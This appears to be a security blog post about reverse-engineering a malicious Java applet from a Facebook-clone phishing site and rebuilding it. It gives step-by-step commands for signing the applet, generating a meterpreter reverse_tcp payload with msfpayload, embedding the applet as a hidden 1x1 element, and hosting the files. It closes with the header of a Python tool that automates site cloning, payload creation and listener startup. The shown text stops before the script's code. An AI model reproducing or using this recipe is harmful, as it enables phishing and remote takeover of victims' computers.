About a year ago I stumbled upon a Facebook clone phishing site which contained an evil Java applet,
At the time SET wasn’t introduced yet and only few articles disscussing this attack vector were published (Another applet creation process was published by Jabra and described later on the Offensive Security “Metasploit Unleashed” Online course).
No source code was released at the time (At least not that I found).
I was curious about this applet and decided to investigate it…
This post describes the “Reversing” of the applet, which includes decompiling to source code, tweaking the code, recompiling, signing and automating the applet creation process using python.
When entering the site a Java security warning pops up asking if i would like to run an applet:
I was able to download the applet files by using its name and adding the .jar and .class extensions
Extracted the jar file:
root@Blackbox:~/Java/facebook# unzip Facebook.jar Archive: Facebook.jar inflating: META-INF/MANIFEST.MF inflating: META-INF/FACEBOOK.SF inflating: META-INF/FACEBOOK.DSA inflating: desktop.ini inflating: Facebook.class inflating: home.JPG inflating: index.htm inflating: index.html inflating: Update.class inflating: ~$test.htm
Decompiled the class files using a free Java decompiler named JD-GUI
I reviewed the source code and notice it all come down to 2 main files (which been decompiled to Java source):
“Update.class” and “Facebook.class”
I played around with the source and tweaked it a bit, After I made the changes it was time to recreate the class and jar files and sign them.
Compiling and Signing the Java applet manually:
Creating and exporting the certificate for signing the applet
root@Blackbox:~/Java/facebook#keytool -genkey -keyalg rsa -alias Facebook root@Blackbox:~/Java/facebook#keytool -export -alias Facebook -file Facebook.crt
Compiling the facebook.java will result in two additional files: facebook.class and update.class
Adding both class files into a JAR file
root@Blackbox:~/Java/facebook#jar cvf Facebook.jar Facebook.class Update.class
Signing the JAR file
root@Blackbox:~/Java/facebook#jarsigner Facebook.jar Facebook
Creating a meterpreter executable using metasploit
root@Blackbox:~/Java/facebook#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 X > payload.exe
Compressing the to a zip file as required by the java source code
root@Blackbox:~/Java/facebook#zip -r payload.zip payload.exe
Created a simple html file and added the code to display the applet:
<applet code="Facebook.class" archive="Facebook.jar" width="1" height="1"></applet>
Copied the the index.html, Facebook.class, Facebook.jar, payload.zip to my web server root folder
The result was good and reliable but every time I want to create a new applet I needed to start this process all over again which is a real pain…
Well, we have SET which does an amazing job in creating those JAVA applets on the fly,cloning web sites and much much more…
but, I couldn’t control the signing process, SET signs the applet as Microsoft as shown in the image below:
I decided to polish my python skills and write a script to automate the applet creation process
Although my script is not versatile nor elegant as SET applet creation process (which also enable creation and execution of Linux payloads) it gets the job done quite nicely for windows based systems.
I used the java code i found in the wild, added website cloning feature based on SET wget syntax
This is the first version of the script, No error handling or input validation, Features are very limited and basic in this version, Maybe i’ll update it in the future and maybe not
Hope you find it useful or you can learn something from it, I know i did
#!/usr/bin/python ''' Created on Jul 4, 2010 @Author: NightRanger, http://exploit.co.il This script designed and tested on BackTrack 4 final with metasploit v3.4.1-dev Requirements: JAVA JDK Install using: "apt-get install sun-java6-jdk" Script features: ---------------- - Generates java applet code on the fly - Generates Keystore / Keystore Removal - Compiles applet code - Package and sings JAR file - Web site cloning - Generates applet html code - Creates a meterpreter executable payload - Starts apache web server - Starts MSFConsole listener * Java applet source code found in the wild, decompiled and tweaked. * Website clone wget syntax taken from SET. Change log: * Jul 5, 2010 - Keystore removal confirmation added